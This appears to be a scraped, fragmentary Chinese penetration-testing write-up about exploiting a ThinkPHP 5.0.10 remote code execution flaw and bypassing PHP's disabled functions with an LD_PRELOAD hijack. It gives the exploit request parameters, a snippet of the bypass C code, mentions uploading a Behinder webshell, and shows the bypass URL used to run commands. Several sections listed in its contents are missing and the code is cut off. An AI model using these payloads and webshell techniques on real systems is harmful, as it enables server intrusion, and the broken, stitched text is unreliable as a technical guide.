目录
前言file_put_contentspcntl_execLD_PRELOAD 劫持总结前言
在一次渗透测试中,手工找了许久没发现什么东西,抱着尝试的心情打开了xray
果然xray还是挺给力的,一打开网页的时候xray直接就扫描出了thinkphp 5.0.10 rce漏洞
直接使用命令执行payload,结果报出system函数被禁用
s=whoami&_method=__construct&method=&filter[]=system
getenv("EVIL_CMDLINE"); // unset environment variable LD_PRELOAD. // unsetenv("LD_PRELOAD") no effect on some // distribution (e.g., centos), I need crafty trick. int i;_LD_PRELOAD
这里利用之前的文件管理冰蝎shell将php和so文易采站长站件上传到服务器web目录
在浏览器访问bypass_disablefunc.php传入参数
http://www.xxx.com/bypass_disablefunc.php?cmd=ls&outpath=/www/wwwroot%20/public/1.txt&sopath=/www/wwwroot/public/bypass_disablefunc_x64.so
成功执行命令








